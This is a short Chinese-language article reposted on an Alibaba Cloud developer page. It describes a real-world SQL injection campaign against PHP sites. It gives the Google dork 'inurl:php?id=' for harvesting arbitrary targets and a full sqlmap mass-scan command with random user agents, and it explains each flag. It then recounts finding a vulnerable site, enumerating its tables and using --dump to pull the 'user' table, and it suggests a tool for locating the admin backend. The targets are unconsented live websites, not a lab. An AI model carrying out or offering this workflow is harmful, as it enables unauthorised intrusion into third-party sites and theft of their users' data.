International - English

Cart Console

Topic Center

Contact Sales

首頁 > 開發者 > PHP

sqlmap測試php實戰

最後更新：2017-05-12 來源：互聯網

上載者：User

創建阿里雲帳戶，並獲得超過 40 款產品的免費試用版；而企業帳戶則可以享有總值 $1200 的免費試用版。立即註冊！

標籤：use thread user 針對 9.png map 存在 bat dump

在Google上搜尋inurl:php?id=

將搜集的url寫到一個檔案當中url.txt中

sqlmap -m url.txt --random-agent --thread=10 --timeout=5 --batch --retries=1 --identify-waf
-m指定url檔案

--random-agent 使用隨機代理

--thread=10 設定線程數為10

--timeout=5 連線逾時5秒放棄

--batch 掃描過程中遇到選項時選擇預設選項

--retries 串連失敗嘗試一次重連

--identify-waf 遇到waf的網站跳過

經過一段時間的掃描，掃描到一個存在sql注入漏洞的網站

掃描所有的表

針對其中的一個表user

掃描這個表

--dump 擷取表內容

-T user指定表

擷取到表的內容

找後台可以用禦劍

sqlmap測試php實戰

本文章原先以中文撰寫並發佈於 aliyun.com，亦設英文版本，僅作資訊用途。本網站不對文章的準確性，完整性或可靠性或其任何翻譯作出任何明示或暗示的陳述或保證。如對該文章有任何疑慮或投訴，請傳送電郵至 info-contact@alibabacloud.com 並提供相關疑慮或投訴的詳細說明。職員會於 5 個工作天內與您聯絡，一經驗證之後，即會刪除該侵權內容。

相關關鍵詞：

監控伺服器swap並重啟php的Shell指令碼_linux shell 01-18

PHP(5)“最長公用首碼”演算法問題 09-08

30個很棒的PHP開源CMS內容管理系統 12-04

php調用dll經驗小結 12-04

PHP匯入匯出Excel方法 12-07

PHP 擷取當前url的函數及參數 12-07

聯繫我們

該頁面正文內容均來源於網絡整理，並不代表阿里雲官方的觀點，該頁面所提到的產品和服務也與阿里云無關，如果該頁面內容對您造成了困擾，歡迎寫郵件給我們，收到郵件我們將在5個工作日內處理。

如果您發現本社區中有涉嫌抄襲的內容，歡迎發送郵件至： info-contact@alibabacloud.com 進行舉報並提供相關證據，工作人員會在 5 個工作天內聯絡您，一經查實，本站將立刻刪除涉嫌侵權內容。

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

Get Started for Free

Sales Support

1 on 1 presale consultation

Chat Contact Sales
After-Sales Support

24/7 Technical Support 6 Free Tickets per Quarter Faster Response

Open a Ticket
Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.

Learn More

sqlmap測試php實戰

聯繫我們

熱門內容

熱門主題

A Free Trial That Lets You Build Big!

Sales Support

After-Sales Support